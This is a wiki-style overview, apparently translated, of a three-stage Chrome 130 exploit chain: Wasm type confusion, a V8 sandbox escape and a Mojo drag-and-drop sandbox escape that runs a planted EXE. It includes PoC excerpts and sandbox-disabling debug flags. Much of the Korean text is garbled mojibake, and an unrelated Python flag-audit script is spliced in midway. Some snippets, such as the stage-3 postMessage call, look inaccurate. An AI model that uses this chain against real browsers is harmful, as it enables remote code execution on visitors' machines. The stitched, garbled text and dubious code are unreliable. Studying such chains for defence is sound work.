Chrome Exploiting

์ด ํŽ˜์ด์ง€๋Š” ์—ฐ๊ตฌ ์‹œ๋ฆฌ์ฆˆ โ€œ101 Chrome Exploitationโ€(Part-0 โ€” Preface)์„ ๊ธฐ๋ฐ˜์œผ๋กœ Google Chrome 130์— ๋Œ€ํ•œ ํ˜„๋Œ€์ ์ธ โ€œfull-chainโ€ exploitation ์›Œํฌํ”Œ๋กœ์šฐ์— ๋Œ€ํ•œ ๋†’์€ ์ˆ˜์ค€์ด๋ฉด์„œ๋„ ์‹ค์šฉ์ ์ธ ๊ฐœ์š”๋ฅผ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. ๋ชฉํ‘œ๋Š” pentesters์™€ exploit-developers๊ฐ€ ์ž์‹ ์˜ ์—ฐ๊ตฌ๋ฅผ ์œ„ํ•ด ๊ธฐ์ˆ ๋“ค์„ ์žฌํ˜„ํ•˜๊ฑฐ๋‚˜ ์ ์‘์‹œํ‚ค๋Š” ๋ฐ ํ•„์š”ํ•œ ์ตœ์†Œํ•œ์˜ ๋ฐฐ๊ฒฝ์ง€์‹์„ ์ œ๊ณตํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค.

1. Chrome Architecture Recap

๊ณต๊ฒฉ ํ‘œ๋ฉด์„ ์ดํ•ดํ•˜๋ ค๋ฉด ์ฝ”๋“œ๊ฐ€ ์–ด๋””์—์„œ ์‹คํ–‰๋˜๋Š”์ง€์™€ ์–ด๋–ค sandboxes๊ฐ€ ์ ์šฉ๋˜๋Š”์ง€๋ฅผ ์•Œ์•„์•ผ ํ•ฉ๋‹ˆ๋‹ค.

Chrome process & sandbox layout

```text
+-------------------------------------------------------------------------+
| Chrome Browser                                                          |
|                                                                         |
|  +----------------------------+      +-----------------------------+    |
|  |  Renderer Process          |      |  Browser/main Process       |    |
|  |  [No direct OS access]     |      |  [OS access]                |    |
|  |  +----------------------+  |      |                             |    |
|  |  |  V8 Sandbox          |  |      |                             |    |
|  |  |  [JavaScript / Wasm] |  |      |                             |    |
|  |  +----------------------+  |      |                             |    |
|  +----------------------------+      +-----------------------------+    |
|                 | IPC/Mojo                                              |
|                 V                                                       |
|  +----------------------------+                                         |
|  |  GPU Process               |                                         |
|  |  [Restricted OS access]    |                                         |
|  +----------------------------+                                         |
+-------------------------------------------------------------------------+
```

Multiple layers of defence-in-depth:

  • V8 sandbox (Isolate): memory permissions are restricted so that JITed JS / Wasm cannot obtain arbitrary read/write.
  • The Renderer ↔ Browser split is enforced through Mojo/IPC message passing; the renderer has no native FS/network access.
  • OS sandboxes further isolate each process (Windows Integrity Levels / seccomp-bpf / macOS sandbox profiles).

๋”ฐ๋ผ์„œ ์›๊ฒฉ ๊ณต๊ฒฉ์ž๋Š” ์—ฐ์†๋œ ์„ธ ๊ฐ€์ง€ ํ”„๋ฆฌ๋ฏธํ‹ฐ๋ธŒ๊ฐ€ ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค:

  1. V8 ๋‚ด๋ถ€์˜ ๋ฉ”๋ชจ๋ฆฌ ์†์ƒ์œผ๋กœ V8 ํž™ ๋‚ด๋ถ€์—์„œ์˜ ์ž„์˜ RW๋ฅผ ์–ป์Œ.
  2. ๊ณต๊ฒฉ์ž๊ฐ€ V8 sandbox๋ฅผ ๋ฒ—์–ด๋‚˜ ์ „์ฒด ๋ Œ๋”๋Ÿฌ ๋ฉ”๋ชจ๋ฆฌ์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•˜๋Š” ๋‘ ๋ฒˆ์งธ ๋ฒ„๊ทธ.
  3. ์ตœ์ข… sandbox ํƒˆ์ถœ(์ข…์ข… ๋ฉ”๋ชจ๋ฆฌ ์†์ƒ์ด ์•„๋‹Œ ๋…ผ๋ฆฌ์  ์ทจ์•ฝ์ )์œผ๋กœ Chrome OS sandbox ์™ธ๋ถ€์—์„œ ์ฝ”๋“œ ์‹คํ–‰.

2. Stage 1 – WebAssembly Type-Confusion (CVE-2025-0291)

A flaw in TurboFan's Turboshaft optimisation mis-classifies WasmGC reference types when a value is produced and consumed inside a single-basic-block loop.

Impact:

  • The compiler skips the type check and treats a reference (externref/anyref) as an int64.
  • Crafted Wasm can overlap JS object headers with attacker-controlled data → addrOf() & fakeObj() AAW / AAR primitives.

Minimal PoC (excerpt):

```wat
(module
  (type $t0 (func (param externref) (result externref)))
  (func $f (param $p externref) (result externref)
    (local $l externref)
    block $exit
      loop $loop
        local.get $p      ;; value with real ref-type
        ;; compiler incorrectly re-uses it as int64 in the same block
        br_if $exit       ;; exit condition keeps us single-block
        br   $loop
      end
    end)
  (export "f" (func $f)))
```

JS์—์„œ ์ตœ์ ํ™” ํŠธ๋ฆฌ๊ฑฐ ๋ฐ spray objects:

```javascript
const wasmMod = new WebAssembly.Module(bytes);
const wasmInst = new WebAssembly.Instance(wasmMod);
const f = wasmInst.exports.f;

for (let i = 0; i < 1e5; ++i) f({});   // warm-up for JIT

// primitives
let victim   = {m: 13.37};
let fake     = arbitrary_data_backed_typedarray;
let addrVict = addrOf(victim);
```

Outcome: arbitrary read/write within V8.


3. Stage 2 – V8 Sandbox Escape (issue 379140430)

When a Wasm function is tier-up-compiled, a JS ↔ Wasm wrapper is generated. Because of a signature-mismatch bug, when the Wasm function is re-optimised while it is still on the stack, the wrapper writes past the end of a trusted Tuple2 object.

Overwriting the 2 × 64-bit fields of the Tuple2 object yields read/write to arbitrary addresses within the Renderer process, effectively bypassing the V8 sandbox.

Key steps of the exploit:

  1. Alternate between turbofan/baseline code so the function ends up in the Tier-Up state.
  2. Trigger tier-up while keeping a reference on the stack (Function.prototype.apply).
  3. Use the Stage-1 AAR/AAW to locate and corrupt the adjacent Tuple2.

Wrapper identification:

```javascript
function wrapperGen(arg) {
  return f(arg);
}
%WasmTierUpFunction(f);          // force tier-up (internals-only flag)
wrapperGen(0x1337n);
```

์†์ƒ ์ดํ›„ ์šฐ๋ฆฌ๋Š” ์™„์ „ํ•œ ๊ธฐ๋Šฅ์„ ๊ฐ–์ถ˜ renderer R/W primitive๋ฅผ ๋ณด์œ ํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.


4. Stage 3 – Renderer → OS Sandbox Escape (CVE-2024-11114)

The Mojo IPC interface blink.mojom.DragService.startDragging() can be called from the Renderer with partially trusted parameters. By crafting the DragData struct to point at an arbitrary file path, the Renderer can convince the browser to perform a native drag-and-drop outside the renderer sandbox.

Abusing this, we can programmatically "drag" a malicious EXE (previously placed in a world-writable location) onto the Desktop, and Windows automatically executes certain file types once they are dropped.

Example (simplified):

```javascript
const payloadPath = "C:\\Users\\Public\\explorer.exe";

chrome.webview.postMessage({
  type: "DragStart",
  data: {
    title: "MyFile",
    file_path: payloadPath,
    mime_type: "application/x-msdownload"
  }
});
```

์ถ”๊ฐ€์ ์ธ ๋ฉ”๋ชจ๋ฆฌ ์†์ƒ์€ ํ•„์š”ํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค โ€“ ๋…ผ๋ฆฌ์  ๊ฒฐํ•จ์œผ๋กœ ์‚ฌ์šฉ์ž์˜ ๊ถŒํ•œ์œผ๋กœ ์ž„์˜์˜ ํŒŒ์ผ ์‹คํ–‰์ด ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค.


5. Full Chain Flow

  1. The user visits a malicious web page.
  2. Stage 1: the Wasm module exploits CVE-2025-0291 → V8 heap AAR/AAW.
  3. Stage 2: the wrapper mismatch corrupts Tuple2 → V8 sandbox escape.
  4. Stage 3: startDragging() IPC → OS sandbox escape & payload execution.

Result: Remote Code Execution (RCE) on the host (Chrome 130, Windows/Linux/macOS).


6. Practice and Debugging Setup

```bash
# Spin-up local HTTP server w/ PoCs
npm i -g http-server
git clone https://github.com/Petitoto/chromium-exploit-dev
cd chromium-exploit-dev
http-server -p 8000 -c -1

# Windows kernel debugging
"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\windbgx.exe" -symbolpath srv*C:\symbols*https://msdl.microsoft.com/download/symbols
```

Chrome์˜ development build์„ ์‹คํ–‰ํ•  ๋•Œ ์œ ์šฉํ•œ flags:

```bash
chrome.exe --no-sandbox --disable-gpu --single-process --js-flags="--allow-natives-syntax"
```
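Each of those switches removes one of the isolation layers from section 1 (`--no-sandbox` the OS sandbox, `--single-process` the Renderer/Browser split, `--allow-natives-syntax` the barrier between page JS and V8 internals such as `%WasmTierUpFunction`), so a production Chrome running with them is a finding. The following added example (not from the page or the research series) audits a captured Chrome command line for exactly those switches, handling the shell quoting of the `--js-flags` value; `audit_chrome_cmdline` and the sample command lines are constructed for this illustration.

```python
import shlex

# Switches from this page's debugging invocation that drop an isolation layer.
# Descriptions are this example's own wording.
SANDBOX_WEAKENING_SWITCHES = {
    "--no-sandbox": "OS sandbox disabled for every child process",
    "--single-process": "renderer code runs inside the browser process",
}
# V8 flags (passed through --js-flags) that expose engine internals to page JS.
V8_INTERNALS_FLAGS = {
    "--allow-natives-syntax": "%-prefixed runtime functions callable from JS",
}


def audit_chrome_cmdline(cmdline: str) -> list[tuple[str, str]]:
    """Return (flag, why) for every isolation-weakening switch in a Chrome command line.

    The line is tokenised with shell quoting rules, so --js-flags="--allow-natives-syntax"
    and --js-flags=--allow-natives-syntax are handled identically. Switches that are
    merely functional (e.g. --disable-gpu) are not reported.
    """
    findings = []
    for arg in shlex.split(cmdline)[1:]:          # argv[0] is the chrome binary itself
        if arg in SANDBOX_WEAKENING_SWITCHES:
            findings.append((arg, SANDBOX_WEAKENING_SWITCHES[arg]))
        elif arg.startswith("--js-flags="):
            # --js-flags carries a space-separated list of V8 flags in its value
            for v8flag in arg[len("--js-flags="):].split():
                if v8flag in V8_INTERNALS_FLAGS:
                    findings.append((v8flag, V8_INTERNALS_FLAGS[v8flag]))
    return findings


# Constructed samples: the debugging invocation from this page, and a plain launch.
DEV_CMDLINE = ('chrome.exe --no-sandbox --disable-gpu --single-process '
               '--js-flags="--allow-natives-syntax"')
PROD_CMDLINE = '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"'

if __name__ == "__main__":
    for flag, why in audit_chrome_cmdline(DEV_CMDLINE):
        print(f"{flag}: {why}")
```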

7. Renderer → Kernel Escape Resources

When a renderer exploit needs a kernel pivot that stays within the seccomp profile, abusing AF_UNIX MSG_OOB sockets, which remain reachable from inside the sandbox, offers a deterministic path. For details on the SKB UAF → kernel RCE chain, see the Linux kernel exploitation case-study below:

Af Unix Msg Oob Uaf Skb Primitives


Key Takeaways

  • WebAssembly JIT bugs remain a reliable entry point – the type system is not yet mature.
  • Obtaining a second memory-corruption bug inside V8 (e.g. the wrapper mismatch) makes the V8-sandbox escape much simpler.
  • Logic-level weaknesses in privileged Mojo IPC interfaces are often enough for the final sandbox escape – pay attention to non-memory bugs.
